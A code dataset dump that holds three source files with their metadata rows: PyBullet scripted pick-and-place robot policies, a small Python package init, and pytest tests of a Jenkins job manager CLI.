        ee_pos, _ = bullet.get_link_state(
            self.env.robot_id, self.env.end_effector_index)
        object_pos, _ = bullet.get_object_position(self.env.blocking_object)
        object_lifted = object_pos[2] > self.pick_height_thresh_noisy
        gripper_pickpoint_dist = np.linalg.norm(self.pick_point - ee_pos)
        gripper_droppoint_dist = np.linalg.norm(self.drop_point - ee_pos)
        done = False
        neutral_action = [0.]
        if self.place_attempted:
            # Return to neutral, then open the drawer.
            if self.neutral_taken:
                # Delegate: the drawer policy emits an 8-dim action that we
                # split back into its components.
                action, info = self.drawer_policy.get_action()
                action_xyz = action[:3]
                action_angles = action[3:6]
                action_gripper = [action[6]]
                neutral_action = [action[7]]
                done = info['done']
            else:
                # One-shot neutral action before handing over.
                action_xyz = [0., 0., 0.]
                action_angles = [0., 0., 0.]
                action_gripper = [0.0]
                neutral_action = [0.7]
                self.neutral_taken = True
        elif gripper_pickpoint_dist > 0.02 and self.env.is_gripper_open:
            # move near the object
            action_xyz = (self.pick_point - ee_pos) * self.xyz_action_scale
            xy_diff = np.linalg.norm(action_xyz[:2] / self.xyz_action_scale)
            if xy_diff > 0.03:
                # Stay level until roughly above the object.
                action_xyz[2] = 0.0
            action_angles = [0., 0., 0.]
            action_gripper = [0.0]
        elif self.env.is_gripper_open:
            # near the object enough, performs grasping action
            action_xyz = (self.pick_point - ee_pos) * self.xyz_action_scale
            action_angles = [0., 0., 0.]
            action_gripper = [-0.7]
        elif not object_lifted:
            # lifting objects above the height threshold for picking
            action_xyz = (self.env.ee_pos_init - ee_pos) * self.xyz_action_scale
            action_angles = [0., 0., 0.]
            action_gripper = [0.]
        elif gripper_droppoint_dist > 0.02:
            # lifted, now need to move towards the container
            action_xyz = (self.drop_point - ee_pos) * self.xyz_action_scale
            action_angles = [0., 0., 0.]
            action_gripper = [0.]
        else:
            # already moved above the container; drop object
            action_xyz = [0., 0., 0.]
            action_angles = [0., 0., 0.]
            action_gripper = [0.7]
            self.place_attempted = True

        agent_info = dict(place_attempted=self.place_attempted, done=done)
        action = np.concatenate(
            (action_xyz, action_angles, action_gripper, neutral_action))
        return action, agent_info
class PickPlaceOpenSuboptimal(PickPlaceOpen):
    """PickPlaceOpen variant that always runs with suboptimal=True."""

    def __init__(self, env, **kwargs):
        super().__init__(env, suboptimal=True, **kwargs)
class PickPlaceOld:
    """Legacy pick-and-place policy.

    Unlike PickPlace it tracks the live object position instead of a fixed
    pick point, and its action is 7-dim (no trailing neutral slot).
    """

    def __init__(self, env, pick_height_thresh=-0.31):
        self.env = env
        # Per-instance jitter on the lift-success threshold.
        self.pick_height_thresh_noisy = (
            pick_height_thresh + np.random.normal(scale=0.01))
        self.xyz_action_scale = 7.0
        self.reset()

    def reset(self):
        """Re-randomize the approach threshold and choose a target object."""
        self.dist_thresh = 0.06 + np.random.normal(scale=0.01)
        self.place_attempted = False
        self.object_to_target = self.env.object_names[
            np.random.randint(self.env.num_objects)]

    def get_action(self):
        """Return (action, agent_info) for the current state."""
        ee_pos, _ = bullet.get_link_state(
            self.env.robot_id, self.env.end_effector_index)
        object_pos, _ = bullet.get_object_position(
            self.env.objects[self.object_to_target])
        object_lifted = object_pos[2] > self.pick_height_thresh_noisy
        object_gripper_dist = np.linalg.norm(object_pos - ee_pos)
        container_pos = self.env.container_position
        # Target hovers 0.15 above the container, with scalar noise added to
        # every coordinate (same draw for x, y and z).
        target_pos = np.append(container_pos[:2], container_pos[2] + 0.15)
        target_pos = target_pos + np.random.normal(scale=0.01)
        gripper_target_dist = np.linalg.norm(target_pos - ee_pos)
        gripper_target_threshold = 0.03
        done = False
        if self.place_attempted:
            # Avoid pick and place the object again after one attempt
            action_xyz = [0., 0., 0.]
            action_angles = [0., 0., 0.]
            action_gripper = [0.]
        elif object_gripper_dist > self.dist_thresh and self.env.is_gripper_open:
            # move near the object
            action_xyz = (object_pos - ee_pos) * self.xyz_action_scale
            xy_diff = np.linalg.norm(action_xyz[:2] / self.xyz_action_scale)
            if xy_diff > 0.03:
                # Stay level until roughly above the object.
                action_xyz[2] = 0.0
            action_angles = [0., 0., 0.]
            action_gripper = [0.0]
        elif self.env.is_gripper_open:
            # near the object enough, performs grasping action
            action_xyz = (object_pos - ee_pos) * self.xyz_action_scale
            action_angles = [0., 0., 0.]
            action_gripper = [-0.7]
        elif not object_lifted:
            # lifting objects above the height threshold for picking
            action_xyz = (self.env.ee_pos_init - ee_pos) * self.xyz_action_scale
            action_angles = [0., 0., 0.]
            action_gripper = [0.]
        elif gripper_target_dist > gripper_target_threshold:
            # lifted, now need to move towards the container
            action_xyz = (target_pos - ee_pos) * self.xyz_action_scale
            action_angles = [0., 0., 0.]
            action_gripper = [0.]
        else:
            # already moved above the container; drop object
            action_xyz = (0., 0., 0.)
            action_angles = [0., 0., 0.]
            action_gripper = [0.7]
            self.place_attempted = True

        agent_info = dict(place_attempted=self.place_attempted, done=done)
        action = np.concatenate((action_xyz, action_angles, action_gripper))
        return action, agent_info
class PickPlaceTarget:
    """Pick a named object and place it on/in a named target (container,
    tray, drawer top, drawer inside, or trashcan).

    Differences from the other policies in this module: get_action() also
    controls wrist angles (angle_action_scale) and returns a THREE-tuple
    (action, agent_info, noise) — noise is a hint for the caller on whether
    action noise is appropriate at this step.
    """

    def __init__(self, env, pick_height_thresh=-0.31, xyz_action_scale=7.0,
                 pick_point_noise=0.00, drop_point_noise=0.00,
                 return_origin_thresh=0.1,
                 angle_action_scale = 0.1,
                 object_target = 'container',
                 object_name='shed'):
        self.env = env
        # Per-instance jitter on the lift-success threshold.
        self.pick_height_thresh_noisy = (
            pick_height_thresh + np.random.normal(scale=0.01))
        self.xyz_action_scale = xyz_action_scale
        self.angle_action_scale = angle_action_scale
        self.pick_point_noise = pick_point_noise
        self.drop_point_noise = drop_point_noise
        self.done = False
        self.place_attempted = False
        self.object_name = object_name
        self.object_target = object_target
        # Map the target name to an env position; list(...) copies so the
        # later in-place z edit cannot clobber env state.
        if self.object_target == 'container':
            self.drop_point = self.env.container_position
        elif self.object_target == 'tray':
            self.drop_point = self.env.tray_position
        elif self.object_target == 'drawer_top':
            self.drop_point = list(self.env.top_drawer_position)
        elif self.object_target == 'drawer_inside':
            self.drop_point = list(self.env.inside_drawer_position)
        elif self.object_target == 'trashcan':
            self.drop_point = list(self.env.trashcan_position)
        else:
            raise NotImplementedError
        self.return_origin_thresh = return_origin_thresh
        self.reset()

    def reset(self, object_target='container', object_name='shed'):
        """Re-target the policy; note reset() overrides the constructor's
        object_target/object_name with its own defaults unless passed."""
        # self.dist_thresh = 0.06 + np.random.normal(scale=0.01)
        self.object_target = object_target
        self.object_name = object_name
        self.object_to_target = self.object_name
        self.pick_point = bullet.get_object_position(
            self.env.objects[self.object_to_target])[0]
        if self.object_to_target in GRASP_OFFSETS.keys():
            self.pick_point += np.asarray(GRASP_OFFSETS[self.object_to_target])
        self.pick_point[2] = -0.34
        # self.pick_point[0] += 0.005
        if object_name == 'shed':
            # Empirical grasp-point correction for the shed object.
            self.pick_point[0] += 0.01
        # self.drop_point = self.env.container_position
        if self.object_target == 'container':
            self.drop_point = list(self.env.container_position)
        elif self.object_target == 'tray':
            self.drop_point = list(self.env.tray_position)
        elif self.object_target == 'drawer_top':
            self.drop_point = list(self.env.top_drawer_position)
        elif self.object_target == 'drawer_inside':
            self.drop_point = list(self.env.inside_drawer_position)
        elif self.object_target == 'trashcan':
            self.drop_point = list(self.env.trashcan_position)
        else:
            raise NotImplementedError
        self.drop_point[2] = -0.15
        # Wrist target angles (degrees) for pick and drop phases.
        self.pick_angle = [90.0, 0.0, 0.0]
        self.drop_angle = [90.0, 0.0, 0.0]
        self.place_attempted = False
        self.done = False

    def get_action(self):
        """Return (action, agent_info, noise) for the current state.

        noise=False flags steps where injected action noise should be
        suppressed (final grasp approach, final drop approach).
        """
        ee_pos, ee_orientation = bullet.get_link_state(
            self.env.robot_id, self.env.end_effector_index)
        ee_deg = bullet.quat_to_deg(ee_orientation)
        # print(f"ee_pos: {ee_pos}, ee_deg: {ee_deg}")
        object_pos, _ = bullet.get_object_position(
            self.env.objects[self.object_to_target])
        # alpha_pick = alpha_between_vec(ee_pos[0:2] - self.env.base_position[0:2],
        #                                self.pick_point[0:2] - self.env.base_position[0:2])
        # alpha_drop = alpha_between_vec(ee_pos[0:2] - self.env.base_position[0:2],
        #                                self.drop_point[0:2] - self.env.base_position[0:2])
        object_lifted = object_pos[2] > self.pick_height_thresh_noisy
        # gripper_pickpoint_dist = np.linalg.norm((self.pick_point - ee_pos)[:1] + (self.pick_point - ee_pos)[2:])
        gripper_pickpoint_dist = np.linalg.norm(self.pick_point - ee_pos)
        # Drop proximity is split: xy distance and signed z offset.
        gripper_droppoint_dist = np.linalg.norm((self.drop_point - ee_pos)[:2])
        gripper_drop_point_dist_z = (self.drop_point - ee_pos)[2]
        origin_dist = self.env.ee_pos_init - ee_pos
        pickpoint_dist = np.linalg.norm(self.pick_point - ee_pos)
        droppoint_dist = np.linalg.norm(self.drop_point - ee_pos)
        # print(f"ee_pos: {ee_pos}, pick_point: {self.pick_point}, drop_point: {self.drop_point}")
        done = False
        # print(origin_dist, np.linalg.norm(origin_dist))
        noise = True
        noise_thresh = 0.015
        if self.place_attempted:
            # Avoid pick and place the object again after one attempt
            # first lift arm keep xy unchanged
            if np.abs(gripper_drop_point_dist_z) < 0.01:
                # print("lifted")
                action_xyz = [0., 0., gripper_drop_point_dist_z * self.xyz_action_scale]
                action_angles = (self.drop_angle - ee_deg) * self.angle_action_scale
                action_gripper = [0.0]
            else:
                # Hold still and report done.
                action_xyz = [0., 0., 0.]
                action_angles = [0., 0., 0.]
                action_gripper = [0.]
                done = True
                self.done = done
        elif gripper_pickpoint_dist > 0.015 and self.env.is_gripper_open:
            # print("move near the object")
            action_xyz = (self.pick_point - ee_pos) * self.xyz_action_scale
            # print(f"distance: {self.pick_point - ee_pos}, ee_pos: {ee_pos}, abs: {pickpoint_dist} ")
            # if pickpoint_dist > noise_thresh:
            #     noise = True
            xy_diff = np.linalg.norm(action_xyz[:2] / self.xyz_action_scale)
            if xy_diff > 0.03:
                # Stay level until roughly above the object.
                action_xyz[2] = 0.0
            # action_angles = [0., 0., 0.]
            action_angles = (self.pick_angle - ee_deg) * self.angle_action_scale
            action_gripper = [0.0]
        elif self.env.is_gripper_open:
            # print("near the object enough, performs grasping action")
            noise = False
            action_xyz = (self.pick_point - ee_pos) * self.xyz_action_scale
            # action_angles = [0., 0., 0.]
            action_angles = (self.pick_angle - ee_deg) * self.angle_action_scale
            action_gripper = [-0.9]
        elif not object_lifted:
            # print("lifting objects above the height threshold for picking")
            action_xyz = (self.env.ee_pos_init - ee_pos) * self.xyz_action_scale
            # action_angles = [0., 0., 0.]
            action_angles = (self.pick_angle - ee_deg) * self.angle_action_scale
            action_gripper = [0.]
        elif gripper_droppoint_dist > 0.02:
            if droppoint_dist < noise_thresh:
                noise = False
            # print("lifted, now need to move towards the container")
            # print(f"distance: {self.drop_point - ee_pos}, ee_pos: {ee_pos}, abs: {droppoint_dist}")
            action_xyz = (self.drop_point - ee_pos) * self.xyz_action_scale
            # action_angles = [0., 0., 0.]
            action_angles = (self.drop_angle - ee_deg) * self.angle_action_scale
            action_gripper = [0.]
        else:
            # print("already moved above the container; drop object")
            action_xyz = (0., 0., 0.)
            action_angles = [0., 0., 0.]
            action_gripper = [0.9]
            self.place_attempted = True
        # import pdb; pdb.set_trace()
        # print(f"ee_pos: {ee_pos}, ee_deg: {ee_deg}, action_angles: {action_angles}")
        # if done and self.place_attempted:
        #     if np.linalg.norm(ee_pos - self.env.ee_pos_init) < self.return_origin_thresh:
        #         self.done = done
        #     else:
        #         action_xyz = (self.env.ee_pos_init - ee_pos) * self.xyz_action_scale
        #         # print(ee_pos, self.env.ee_pos_init)
        #         # print(np.linalg.norm(ee_pos - self.env.ee_pos_init))
        agent_info = dict(place_attempted=self.place_attempted, done=self.done)
        neutral_action = [0.]
        action = np.concatenate(
            (action_xyz, action_angles, action_gripper, neutral_action))
        # import pdb; pdb.set_trace()
        return action, agent_info, noise
| 43.719258
| 114
| 0.607706
| 2,481
| 18,843
| 4.314792
| 0.069327
| 0.016441
| 0.010929
| 0.026903
| 0.819804
| 0.781784
| 0.761046
| 0.72639
| 0.705465
| 0.686035
| 0
| 0.027227
| 0.290506
| 18,843
| 431
| 115
| 43.719258
| 0.773506
| 0.146049
| 0
| 0.716511
| 0
| 0
| 0.00761
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040498
| false
| 0
| 0.015576
| 0
| 0.084112
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
76d4b562f2fe0252248379b5446096abc8804a16
| 147
|
py
|
Python
|
tools/console/plugins/plugin_compile/__init__.py
|
rh101/engine-x
|
17ad9829dd410c689857760b6ece89d99e877a95
|
[
"MIT"
] | 113
|
2020-02-25T03:19:32.000Z
|
2021-05-17T09:15:40.000Z
|
tools/console/plugins/plugin_compile/__init__.py
|
rh101/engine-x
|
17ad9829dd410c689857760b6ece89d99e877a95
|
[
"MIT"
] | 172
|
2020-02-21T08:56:42.000Z
|
2021-05-12T03:18:40.000Z
|
tools/console/plugins/plugin_compile/__init__.py
|
rh101/engine-x
|
17ad9829dd410c689857760b6ece89d99e877a95
|
[
"MIT"
] | 62
|
2020-02-23T14:10:16.000Z
|
2021-05-14T13:53:19.000Z
|
"""Expose CCPluginCompile, choosing the import form by Python major version."""
import sys

if sys.version_info.major >= 3:
    # Python 3: package-relative import.
    from .project_compile import CCPluginCompile
else:
    # Python 2: implicit relative import.
    from project_compile import CCPluginCompile
| 24.5
| 48
| 0.789116
| 19
| 147
| 5.947368
| 0.631579
| 0.19469
| 0.318584
| 0.424779
| 0.690265
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008
| 0.14966
| 147
| 5
| 49
| 29.4
| 0.896
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
76e7bf2bdbb2617003de566acb459a4b7acea237
| 12,573
|
py
|
Python
|
tests/test_jenkins_job_manager.py
|
erilyz/jenkins-job-manager
|
550227f5d4e1932bdd5a12ead2907a26289ea174
|
[
"Apache-2.0"
] | null | null | null |
tests/test_jenkins_job_manager.py
|
erilyz/jenkins-job-manager
|
550227f5d4e1932bdd5a12ead2907a26289ea174
|
[
"Apache-2.0"
] | null | null | null |
tests/test_jenkins_job_manager.py
|
erilyz/jenkins-job-manager
|
550227f5d4e1932bdd5a12ead2907a26289ea174
|
[
"Apache-2.0"
] | null | null | null |
from functools import partial
import logging
import os
import pytest
from unittest import mock
import click.testing
import tomlkit
from jenkins_job_manager import __version__
from jenkins_job_manager.cli import jjm
HERE = os.path.dirname(os.path.realpath(__file__))
PROJECT_DIR = os.path.realpath(HERE + "/../")
def test_version():
    """The package __version__ must match the version in pyproject.toml."""
    pyproject_path = f"{PROJECT_DIR}/pyproject.toml"
    with open(pyproject_path) as fh:
        doc = tomlkit.parse(fh.read())
    print(doc)
    assert __version__ == doc["tool"]["poetry"]["version"]
@pytest.fixture
def jjm_runner():
    """Fixture: a callable that invokes the jjm CLI with given args."""
    cli_runner = click.testing.CliRunner()
    return partial(cli_runner.invoke, jjm)
# Common CLI flags exercised by the "*_all_args" tests: debug (-d),
# working directory (-C /tmp), and an explicit Jenkins URL.
base_args = [
    "-d",
    "-C",
    "/tmp",
    "--url",
    "https://yourjenkinsurl.com/",
]
# Config overrides the CLI is expected to pass to JenkinsJobManager:
# with --url set, and with no flags at all.
overrides_url = {"url": "https://yourjenkinsurl.com/"}
overrides_none = {}
@mock.patch("jenkins_job_manager.cli.log", autospec=True)
@mock.patch("jenkins_job_manager.cli.handle_plan_report", autospec=True)
@mock.patch("jenkins_job_manager.cli.handle_validation_errors", autospec=True)
@mock.patch("jenkins_job_manager.cli.check_auth", autospec=True)
@mock.patch("jenkins_job_manager.cli.jjm_check", autospec=True)
@mock.patch("jenkins_job_manager.cli.JenkinsJobManager", autospec=True)
def test_jjm_no_args(
    JenkinsJobManager,
    jjm_check,
    check_auth,
    handle_validation_errors,
    handle_plan_report,
    log,
    jjm_runner,
):
    """Bare `jjm` prints usage (exit 0) and calls none of the CLI helpers.

    mock.patch decorators inject mocks bottom-up: the first parameter is
    the innermost (last-listed) decorator.
    """
    result = jjm_runner()
    assert result.exit_code == 0
    assert "Usage:" in result.output
    log.setLevel.assert_not_called()
    JenkinsJobManager.assert_not_called()
    JenkinsJobManager.gather.assert_not_called()
    jjm_check.assert_not_called()
    check_auth.assert_not_called()
    handle_validation_errors.assert_not_called()
    handle_plan_report.assert_not_called()
@mock.patch("jenkins_job_manager.cli.log", autospec=True)
@mock.patch("jenkins_job_manager.cli.handle_plan_report", autospec=True)
@mock.patch("jenkins_job_manager.cli.handle_validation_errors", autospec=True)
@mock.patch("jenkins_job_manager.cli.check_auth", autospec=True)
@mock.patch("jenkins_job_manager.cli.jjm_check", autospec=True)
@mock.patch("jenkins_job_manager.cli.JenkinsJobManager", autospec=True)
def test_jjm_all_args(
    JenkinsJobManager,
    jjm_check,
    check_auth,
    handle_validation_errors,
    handle_plan_report,
    log,
    jjm_runner,
):
    """Global flags without a subcommand exit 2 (usage error) and call no
    helpers. Mocks are injected bottom-up by the patch decorators."""
    result = jjm_runner(base_args)
    assert result.exit_code == 2
    assert "Usage:" in result.output
    log.setLevel.assert_not_called()
    JenkinsJobManager.assert_not_called()
    JenkinsJobManager.gather.assert_not_called()
    jjm_check.assert_not_called()
    check_auth.assert_not_called()
    handle_validation_errors.assert_not_called()
    handle_plan_report.assert_not_called()
@mock.patch("jenkins_job_manager.cli.log", autospec=True)
@mock.patch("jenkins_job_manager.cli.handle_plan_report", autospec=True)
@mock.patch("jenkins_job_manager.cli.handle_validation_errors", autospec=True)
@mock.patch("jenkins_job_manager.cli.check_auth", autospec=True)
@mock.patch("jenkins_job_manager.cli.jjm_check", autospec=True)
@mock.patch("jenkins_job_manager.cli.JenkinsJobManager", autospec=True)
def test_jjm_apply_no_args(
    JenkinsJobManager,
    jjm_check,
    check_auth,
    handle_validation_errors,
    handle_plan_report,
    log,
    jjm_runner,
):
    """`jjm apply` with no flags: constructs the manager with empty
    overrides, checks auth, validates, and reports the plan without a
    pager. Mocks are injected bottom-up by the patch decorators."""
    result = jjm_runner(["apply"])
    assert result.exit_code == 1
    assert "ERROR" not in result.output
    log.setLevel.assert_not_called()
    JenkinsJobManager.assert_called_once_with(overrides_none)
    JenkinsJobManager.gather.assert_not_called()
    jjm_check.assert_not_called()
    check_auth.assert_called_once_with(JenkinsJobManager())
    handle_validation_errors.assert_called_once_with(JenkinsJobManager())
    handle_plan_report.assert_called_once_with(JenkinsJobManager(), use_pager=False)
@mock.patch("jenkins_job_manager.cli.log", autospec=True)
@mock.patch("jenkins_job_manager.cli.handle_plan_report", autospec=True)
@mock.patch("jenkins_job_manager.cli.handle_validation_errors", autospec=True)
@mock.patch("jenkins_job_manager.cli.check_auth", autospec=True)
@mock.patch("jenkins_job_manager.cli.jjm_check", autospec=True)
@mock.patch("jenkins_job_manager.cli.JenkinsJobManager", autospec=True)
def test_jjm_apply_all_args(
    JenkinsJobManager,
    jjm_check,
    check_auth,
    handle_validation_errors,
    handle_plan_report,
    log,
    jjm_runner,
):
    """`jjm -d ... apply --target bogus`: -d enables DEBUG logging and the
    --url flag flows into the manager overrides. Mocks are injected
    bottom-up by the patch decorators."""
    result = jjm_runner(base_args + ["apply"] + ["--target", "bogus"])
    assert result.exit_code == 1
    assert "ERROR" not in result.output
    log.setLevel.assert_called_once_with(logging.DEBUG)
    JenkinsJobManager.assert_called_once_with(overrides_url)
    JenkinsJobManager.gather.assert_not_called()
    jjm_check.assert_not_called()
    check_auth.assert_called_once_with(JenkinsJobManager())
    handle_validation_errors.assert_called_once_with(JenkinsJobManager())
    handle_plan_report.assert_called_once_with(JenkinsJobManager(), use_pager=False)
@mock.patch("jenkins_job_manager.cli.log", autospec=True)
@mock.patch("jenkins_job_manager.cli.handle_plan_report", autospec=True)
@mock.patch("jenkins_job_manager.cli.handle_validation_errors", autospec=True)
@mock.patch("jenkins_job_manager.cli.check_auth", autospec=True)
@mock.patch("jenkins_job_manager.cli.jjm_check", autospec=True)
@mock.patch("jenkins_job_manager.cli.JenkinsJobManager", autospec=True)
def test_jjm_check_no_args(
    JenkinsJobManager,
    jjm_check,
    check_auth,
    handle_validation_errors,
    handle_plan_report,
    log,
    jjm_runner,
):
    """`jjm check`: validates only — no auth check and no plan report.
    Mocks are injected bottom-up by the patch decorators."""
    result = jjm_runner(["check"])
    assert result.exit_code == 0
    assert "ERROR" not in result.output
    log.setLevel.assert_not_called()
    JenkinsJobManager.assert_called_with(overrides_none)
    JenkinsJobManager.gather.assert_not_called()
    jjm_check.assert_not_called()
    check_auth.assert_not_called()
    handle_validation_errors.assert_called_once_with(JenkinsJobManager())
    handle_plan_report.assert_not_called()
@mock.patch("jenkins_job_manager.cli.log", autospec=True)
@mock.patch("jenkins_job_manager.cli.handle_plan_report", autospec=True)
@mock.patch("jenkins_job_manager.cli.handle_validation_errors", autospec=True)
@mock.patch("jenkins_job_manager.cli.check_auth", autospec=True)
@mock.patch("jenkins_job_manager.cli.jjm_check", autospec=True)
@mock.patch("jenkins_job_manager.cli.JenkinsJobManager", autospec=True)
def test_jjm_check_all_args(
    # mock.patch decorators inject bottom-up: the innermost patch is the first arg.
    JenkinsJobManager,
    jjm_check,
    check_auth,
    handle_validation_errors,
    handle_plan_report,
    log,
    jjm_runner,  # CLI-runner fixture; defined outside this file's visible scope
):
    """`check --load-plugins` with all flags: DEBUG logging and URL override
    are applied; only validation-error handling runs, and the command exits 0.
    """
    result = jjm_runner(base_args + ["check", "--load-plugins"])
    assert result.exit_code == 0
    assert "ERROR" not in result.output
    log.setLevel.assert_called_once_with(logging.DEBUG)
    JenkinsJobManager.assert_called_once_with(overrides_url)
    JenkinsJobManager.gather.assert_not_called()
    jjm_check.assert_not_called()
    check_auth.assert_not_called()
    handle_plan_report.assert_not_called()
    handle_validation_errors.assert_called_once_with(JenkinsJobManager())
@mock.patch("jenkins_job_manager.cli.log", autospec=True)
@mock.patch("jenkins_job_manager.cli.handle_plan_report", autospec=True)
@mock.patch("jenkins_job_manager.cli.handle_validation_errors", autospec=True)
@mock.patch("jenkins_job_manager.cli.check_auth", autospec=True)
@mock.patch("jenkins_job_manager.cli.jjm_check", autospec=True)
@mock.patch("jenkins_job_manager.cli.JenkinsJobManager", autospec=True)
def test_jjm_import_no_args(
    # mock.patch decorators inject bottom-up: the innermost patch is the first arg.
    JenkinsJobManager,
    jjm_check,
    check_auth,
    handle_validation_errors,
    handle_plan_report,
    log,
    jjm_runner,  # CLI-runner fixture; defined outside this file's visible scope
):
    """Bare `import`: auth is checked, nothing is imported (mocked manager
    yields no jobs), and the summary line reports zero imports.
    """
    result = jjm_runner(["import"])
    assert result.exit_code == 0
    assert "ERROR" not in result.output
    assert "Imported 0 jobs." in result.output
    log.setLevel.assert_not_called()
    JenkinsJobManager.assert_called_once_with(overrides_none)
    JenkinsJobManager.gather.assert_not_called()
    jjm_check.assert_not_called()
    check_auth.assert_called_once_with(JenkinsJobManager())
    handle_validation_errors.assert_not_called()
    handle_plan_report.assert_not_called()
@mock.patch("jenkins_job_manager.cli.log", autospec=True)
@mock.patch("jenkins_job_manager.cli.handle_plan_report", autospec=True)
@mock.patch("jenkins_job_manager.cli.handle_validation_errors", autospec=True)
@mock.patch("jenkins_job_manager.cli.check_auth", autospec=True)
@mock.patch("jenkins_job_manager.cli.jjm_check", autospec=True)
@mock.patch("jenkins_job_manager.cli.JenkinsJobManager", autospec=True)
def test_jjm_import_all_args(
    # mock.patch decorators inject bottom-up: the innermost patch is the first arg.
    JenkinsJobManager,
    jjm_check,
    check_auth,
    handle_validation_errors,
    handle_plan_report,
    log,
    jjm_runner,  # CLI-runner fixture; defined outside this file's visible scope
):
    """`import` with all flags: DEBUG logging and URL override applied; auth
    is checked and the summary line still reports zero imports.
    """
    result = jjm_runner(base_args + ["import"] + ["--target", "bogus"])
    assert result.exit_code == 0
    assert "ERROR" not in result.output
    assert "Imported 0 jobs." in result.output
    log.setLevel.assert_called_once_with(logging.DEBUG)
    JenkinsJobManager.assert_called_once_with(overrides_url)
    JenkinsJobManager.gather.assert_not_called()
    jjm_check.assert_not_called()
    check_auth.assert_called_once_with(JenkinsJobManager())
    handle_validation_errors.assert_not_called()
    handle_plan_report.assert_not_called()
@mock.patch("jenkins_job_manager.cli.log", autospec=True)
@mock.patch("jenkins_job_manager.cli.handle_plan_report", autospec=True)
@mock.patch("jenkins_job_manager.cli.handle_validation_errors", autospec=True)
@mock.patch("jenkins_job_manager.cli.check_auth", autospec=True)
@mock.patch("jenkins_job_manager.cli.jjm_check", autospec=True)
@mock.patch("jenkins_job_manager.cli.JenkinsJobManager", autospec=True)
def test_jjm_login_no_args(
    # mock.patch decorators inject bottom-up: the innermost patch is the first arg.
    JenkinsJobManager,
    jjm_check,
    check_auth,
    handle_validation_errors,
    handle_plan_report,
    log,
    jjm_runner,  # CLI-runner fixture; defined outside this file's visible scope
):
    """Bare `login` against an already-configured Jenkins: the command bails
    out with exit code 1 and no other collaborator is invoked.
    """
    result = jjm_runner(["login"])
    assert result.exit_code == 1
    assert "ERROR" not in result.output
    assert "Auth already configured for this jenkins" in result.output
    log.setLevel.assert_not_called()
    JenkinsJobManager.assert_called_once_with(overrides_none)
    JenkinsJobManager.gather.assert_not_called()
    jjm_check.assert_not_called()
    check_auth.assert_not_called()
    handle_validation_errors.assert_not_called()
    handle_plan_report.assert_not_called()
@mock.patch("jenkins_job_manager.cli.log", autospec=True)
@mock.patch("jenkins_job_manager.cli.handle_plan_report", autospec=True)
@mock.patch("jenkins_job_manager.cli.handle_validation_errors", autospec=True)
@mock.patch("jenkins_job_manager.cli.check_auth", autospec=True)
@mock.patch("jenkins_job_manager.cli.jjm_check", autospec=True)
@mock.patch("jenkins_job_manager.cli.JenkinsJobManager", autospec=True)
def test_jjm_plan_no_args(
    # mock.patch decorators inject bottom-up: the innermost patch is the first arg.
    JenkinsJobManager,
    jjm_check,
    check_auth,
    handle_validation_errors,
    handle_plan_report,
    log,
    jjm_runner,  # CLI-runner fixture; defined outside this file's visible scope
):
    """Bare `plan`: default overrides, auth and validation run, and the plan
    report uses the pager (use_pager=True is the default for `plan`).
    """
    result = jjm_runner(["plan"])
    assert result.exit_code == 0
    assert "ERROR" not in result.output
    log.setLevel.assert_not_called()
    JenkinsJobManager.assert_called_once_with(overrides_none)
    JenkinsJobManager.gather.assert_not_called()
    jjm_check.assert_not_called()
    check_auth.assert_called_once_with(JenkinsJobManager())
    handle_validation_errors.assert_called_once_with(JenkinsJobManager())
    handle_plan_report.assert_called_once_with(JenkinsJobManager(), use_pager=True)
@mock.patch("jenkins_job_manager.cli.log", autospec=True)
@mock.patch("jenkins_job_manager.cli.handle_plan_report", autospec=True)
@mock.patch("jenkins_job_manager.cli.handle_validation_errors", autospec=True)
@mock.patch("jenkins_job_manager.cli.check_auth", autospec=True)
@mock.patch("jenkins_job_manager.cli.jjm_check", autospec=True)
@mock.patch("jenkins_job_manager.cli.JenkinsJobManager", autospec=True)
def test_jjm_plan_all_args(
    # mock.patch decorators inject bottom-up: the innermost patch is the first arg.
    JenkinsJobManager,
    jjm_check,
    check_auth,
    handle_validation_errors,
    handle_plan_report,
    log,
    jjm_runner,  # CLI-runner fixture; defined outside this file's visible scope
):
    """`plan --skip-pager --target bogus` with all flags: DEBUG logging and
    URL override applied; the pager is suppressed (use_pager=False).
    """
    plan_args = ["--skip-pager", "--target", "bogus"]
    result = jjm_runner(base_args + ["plan"] + plan_args)
    assert result.exit_code == 0
    # "Usage" absence guards against click rejecting the flag combination.
    assert "Usage" not in result.output
    log.setLevel.assert_called_once_with(logging.DEBUG)
    JenkinsJobManager.assert_called_once_with(overrides_url)
    JenkinsJobManager.gather.assert_not_called()
    jjm_check.assert_not_called()
    check_auth.assert_called_once_with(JenkinsJobManager())
    handle_validation_errors.assert_called_once_with(JenkinsJobManager())
    handle_plan_report.assert_called_once_with(JenkinsJobManager(), use_pager=False)
| 36.979412
| 84
| 0.777539
| 1,671
| 12,573
| 5.472172
| 0.06164
| 0.074366
| 0.126422
| 0.146544
| 0.933836
| 0.92126
| 0.918854
| 0.911964
| 0.911964
| 0.910871
| 0
| 0.001165
| 0.112781
| 12,573
| 339
| 85
| 37.088496
| 0.818557
| 0
| 0
| 0.812298
| 0
| 0
| 0.225324
| 0.199077
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.042071
| false
| 0
| 0.048544
| 0
| 0.093851
| 0.003236
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
